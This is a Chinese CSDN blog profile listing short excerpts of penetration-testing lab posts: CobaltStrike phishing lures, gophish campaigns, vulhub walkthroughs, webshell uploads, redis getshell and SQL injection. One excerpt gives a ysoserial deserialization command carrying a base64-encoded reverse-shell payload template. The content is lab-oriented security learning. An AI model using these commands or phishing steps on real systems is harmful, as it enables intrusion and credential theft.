自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(35)
  • 收藏
  • 关注

原创 CS钓鱼鱼饵制作的方式

这一步骤可以参见我们的CS配置文章然后点击添加我们的监听器点击生成即可,然后选择保存位置然后运行exe即可上线CS。

2025-08-11 23:26:53 497

原创 gophish钓鱼流程

Bulk Import Users是批量导入用户邮箱,它通过上传符合模板的CSV文件来批量导入目标用户邮箱,点击旁边灰色字体的DownloadCSVTemplate可以下载特定的CSV模板文件。其中,模板文件的Email是必填项,其余选填。用户可以先在自己的邮箱里放送一份设计好的邮件,打开并选择导出eml文件或者显示邮件原文,然后把内容复制到import Email里,这里以自己给自己写邮件为例。在gophish中,Users$Groups的作用就是将钓鱼的目标邮箱导入gophish中准备发送。

2025-08-11 23:00:15 357

原创 CobaltStrike的搭建与使用

首先我们将下载好的压缩包上传到我们的服务器,作为服务端然后unzip解压得到这个文件夹然后进入我们解压后的文件夹然后进入server文件夹,给予文件夹内所有的文件可执行权限然后运行服务端记得命令中是服务端的IP然后IP后是密码启动之后我们就开始启动我们的客户端进行连接,双击bat文件即可输入服务端的IP以及端口,密码使用我们设置的密码,登录即可。

2025-08-11 21:36:11 301

原创 Xstream反序列化,fastjson,jcakson靶场复现

XStream是⼀个简单的基于Java库,Java对象序列化到XML,历史上存在多个反序列化漏洞。首先启动我们的环境然后访问一下下载反序列化工具然后执行我们的命令注意需要将反弹shell的语句进行base64加密java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1098 CommonsCollections6 "bash -c {echo,base64加密后的反弹shell语句}|{base64,-d}|{bash,-i}"

2025-08-10 17:43:09 562

原创 vulhub-Beelzebub靶机

我们右键查看页面源代码,发现他居然是一个静态源代码,里面居然还有一个提示MD5加密。我们依次访问一下,最终在这个目录下看到一个talk to valak的目录。我们挨个访问一下,首页页面发现是404,但是我们扫描的时候显示的是200。然后F12,这里我们随便输一个值,然后在cookie中找到了一个密码。有了密码现在需要用户名,这里我们用wpscan扫描一下,找到两个账户。可以看到是下载了一个东西,然后去执行这个程序,我们尝试一下这个步骤。登录成功,我们看一下历史命令记录,发现了这一段。

2025-08-09 16:48:42 448

原创 vulhub-doubletrouble靶机

注意切换网卡模式。

2025-08-09 11:52:30 446

原创 vulhub-drippingblues靶机

根据之前的提示需要drio,我们这里猜测需要用到drip来传参,我们再将第二个拒绝访问的目录作为参数拼接,获得了密码,第一个单词就是我们的密码。访问一下第一个,告诉了一下我们怎么获取ssh密码,但是这里我们并不知道是哪几个歌词,第二个路径也访问不到。发现可以登录成功,我们可以看到有一个压缩文件,我们给他下下来看一下。发现一个txt文件我们看一下有啥内容,让我们专注于drop。这里我们看到ftp允许匿名登录,所以我们尝试登录。我们先访问一下robots目录,发现两个路径。解压时发现需要密码,我们爆破一下。

2025-08-08 18:13:26 467

原创 vulhub-corrosion2靶机

说服务器上有个文件还有密码,我们去看一下那个压缩包,发现解压需要密码,我们使用kali的工具爆破一下。扫描到一个压缩包还有readme.txt,还有一些别的目录,我们访问一下看看有没有有用的信息。访问一个8080端口发现是一个apache的页面。80端口没有扫描到东西,这里我们扫描8080。然后使用msfconsole获取shell。输入shell,就可以执行命令了。然后去解压看一下里面的内容。找到两组登录用户和密码。首先访问一下80端口。那么我们扫描一下目录。

2025-08-03 16:37:06 509

原创 vulhub-ELECTRICAL靶机

第二个payload我们找一个密码本去爆破一下密码,点击load选一个密码字典爆破即可。然后破解我们的2.txt,首先将kali自带的密码字典进行解压,然后利用字典进行破解。从扫描的端口来看只有8834能访问到,这里我们扫描一下这个端口的目录。这里可以看到两个用户名,但是没有密码,我们尝试使用bp爆破一下。可以看到一个api的目录可以访问,发现没有什么可以利用的。首先将我们的密钥存储在一个文本中然后转化为可破解的形式。根据长度我们可以判断出,这个为用户名和密码。发送到intruder。

2025-08-03 15:32:40 262

原创 vulhub-noob靶机

可以看到第一个让我们尝试旋转几个字母,这里我们旋转一下第二个文件的内容推测是rot加密,试一下rot13解密。然后去访问一下我们的80端口,发现是一个登录页面,我们拿上一个端口的账号密码登录一下。像是账号密码的形式,有因为之前查找端口的时候查到开启了ssh,我们尝试登录一下ssh。我们去kali上用工具看一下,首先我们看一下sudo里面有什么。点击about us会下载一个文件,我们解压一下。我们看一下两个文件里面都有什么内容。我们先访问一下ftp看一下。我们将两个文件提取一下。base64解码一下。

2025-08-03 14:07:32 150

原创 ThinkPHP5x,struts2等框架靶场复现

ThinkphpThinkphpThinkphp5x远程命令执行及getshell首先我们先找一个环境,或者自己搭建一个环境fofa:body=搭建:vulhub/thinkphp/5-rce然后去访问我们的环境。

2025-08-03 12:44:37 345

原创 Tomcat,WebLogic等中间件漏洞实战解析

首先启动环境,这里所有的漏洞都是在vulhub中的然后去访问我们的网站点击打开哥斯拉去生成一个jsp木马然后打开抓包,刷新一下页面,修改put方法将我们的木马上传一下,这里需要在jsp后加一个/,来绕过对jsp文件的上传限制然后去访问一下我们上传的1.jsp可以看到访问成功,我们去用哥斯拉链接一下后台弱口令部署war包这里需要启动tomcat8,我们cd到tomcat8中启动一下环境然后去访问一下通过弱口令我们登录到后台,点击managerapp,账号密码都为tomcat。

2025-07-31 20:56:21 1354

原创 vulhub-Thales靶机练习

可以看到没有IP地址,所以我们得通过kali扫出我们的IP地址。

2025-07-30 20:21:17 437

原创 vulhub-ica1靶机

可以看到我们的IP地址为172.16.2.42。

2025-07-30 19:38:02 445

原创 WordPress与主流CMS拿Webshell实战

首先我们在vulhub中启动我们wordpress的doaker容器然后去访问我们的80端口然后选择简体中文进行安装然后就可以登录到我们的后台界面了。

2025-07-30 17:27:42 1035

原创 vulhub-breakout靶机

下载完成后安装到vmware可以看到已经给了我IP地址。

2025-07-29 18:44:52 308

原创 Vulnhub-NAPPING: 1.0.1靶机

在官网中下载好对应的靶机安装到VirtualBox中,这里使用的网络模式为桥接。

2025-07-29 17:23:04 524

原创 redis getshell的方法

1.下载redis2.解压并编译make3.修改配置文件允许除本机之外的主机远程连接,关闭保护模式然后启动redis服务,需要指定修改后的配置文件,路径要改为自己的路径。

2025-07-29 00:46:43 941

原创 redis,MongoDB等未授权访问靶场复现

未授权

2025-07-28 20:41:46 1259

原创 vulhub-red靶机

从官网上下载靶机安装到我们的vb虚拟机上,将网络模式调至和kali一样即可。

2025-07-27 16:44:09 457

原创 jangow 1.0.1靶机

去官网下载好靶机后,双击安装到我们的vb虚拟机中修改虚拟机网络模式与kali一样,我这里全部修改为了桥接。

2025-07-27 14:39:31 402

原创 逻辑支付漏洞

这里我们选择自己搭一个cmseasy的环境,版本为7.6.2.3在购买物品时先正常选择物品,数量这里我们选择六个点击购买,跳转到支付页面将数量修改为负数,可以看到金额变成了负数,进行支付点击余额支付即可购买成功,这时候我们再看我们的余额,已经变成了16200,这时候就可以用我们获取的余额来进行支付了。

2025-07-27 13:29:05 203

原创 Vulhub-Earth靶机

下载靶机后安装包VirtualBox虚拟机中,将虚拟机的网络模式修改为和kali同一个模式即可,再同一个网段中。

2025-07-25 17:20:15 621

原创 vulhub-Web Machine N7靶机

从官网下载好ova文件后双击,选择VB虚拟机进行安装安装好后修改一下网络模式为桥接同时我们的kali也修改一下为桥接。

2025-07-24 19:49:44 336

原创 vulnhub-Matrix-Breakout 2 Morpheus 靶机

然后我们扫描我们NAT网卡的网段,发现开放了3个端口。

2025-07-24 18:29:09 149

原创 vulhub-log4j -CVE-2021-44228

进入该目录中启动环境。

2025-07-23 20:36:31 368

原创 CTF-hub Bypass disable_function靶场

我们可以看到一个一句话木马在所框住的区域内。

2025-07-23 20:05:24 471

原创 中间件漏洞

我们在windows2003中进行复现首先创建一个下.asp的文件夹然后在文件夹中写入一个1.jpg文件,但是内容为我们的asp语言然后访问我们文件夹中的1.jpg发现我们的asp代码被解析了。

2025-07-22 20:16:59 836

原创 Tomato靶机

双击我们下好的tomato,即可安装对应的靶机。

2025-07-21 18:11:34 228

原创 AI-WEB 1.0靶机

双击图中所示程序,即可启动靶机。

2025-07-20 20:17:38 187

原创 upload-labs靶场

访问靶场,查看源码,发现是通过这关函数来判断上传的类型,我们可以直接将这关判断函数删掉后再进行上传我们的一句话木马发现可以成功上传,我们可以通过右键新标签页打开图片来查看是否上传成功,可以看到上传成功。

2025-07-20 18:48:34 747

原创 XXE靶场

双击安装靶场。

2025-07-17 20:35:46 293

原创 CTF-hub——SSRF靶场

启动靶场环境根据题目提醒让我们访问127.0.0.1 中的falg.php,这里我们直接在url后拼接即可获得flag。

2025-07-17 19:34:48 1217

原创 墨客SQL手工注入漏洞测试

本文介绍了四种数据库(Oracle、Db2、MongoDB、PostgreSQL)的手工SQL注入测试方法。主要内容包括:1)判断列数和回显位置;2)获取数据库名称、表名和列名;3)通过union查询提取字段内容。其中Oracle使用dual伪表,Db2通过syscat系统表,MongoDB使用JSON格式返回结果,PostgreSQL查询information_schema获取信息。最后通过获取的用户名密码解密登录,均可获得flag。文章详细展示了不同数据库注入时的SQL语法差异和具体操作步骤。

2025-07-14 20:26:24 971

原创 sqli—labs通关教程(持续更新目前第六十五关)

在网站地址后拼接?id=1’ and 1=1 --+,发现访问正常拼接?id=1’ and 1=2--+ 错误因此判断为字符型。

2025-07-09 21:32:04 1066

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除